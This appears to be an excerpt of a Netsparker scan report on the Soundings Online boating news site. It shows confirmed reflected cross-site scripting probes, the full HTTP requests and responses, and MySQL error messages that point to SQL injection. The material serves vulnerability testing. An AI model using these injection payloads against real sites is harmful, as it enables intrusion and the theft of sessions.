href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-n..
- /news/todays-top-stories/275632-sailors-at-top-of-their-games-to-compete

/news/todays-top-stories/275632-sailors-at-top-of-their-games-to-compete CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/275632-sailors-at-top-of-their-games-to-compe..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025D3)</script>

Request

GET /news/todays-top-stories/275632-sailors-at-top-of-their-games-to-compete?'"--></style></script><script>netsparker(0x0025D3)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/index.php?format=feed&type=rss
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:41:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D3)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D3)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/275632-sailors-at-top-of-their-games-to-compete" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Sailors at top of their games to compete" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Sailors at top of their games to compete</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-new..
- /news/todays-top-stories/275662-state-bill-would-ban-alcohol-on-waterways

/news/todays-top-stories/275662-state-bill-would-ban-alcohol-on-waterways CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/275662-state-bill-would-ban-alcohol-on-waterw..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025D4)</script>

Request

GET /news/todays-top-stories/275662-state-bill-would-ban-alcohol-on-waterways?'"--></style></script><script>netsparker(0x0025D4)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/index.php?format=feed&type=rss
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:41:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D4)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D4)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/275662-state-bill-would-ban-alcohol-on-waterways" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="State bill would ban alcohol on waterways" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>State bill would ban alcohol on waterways</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-..
- /component/content/frontpage

/component/content/frontpage CONFIRMED

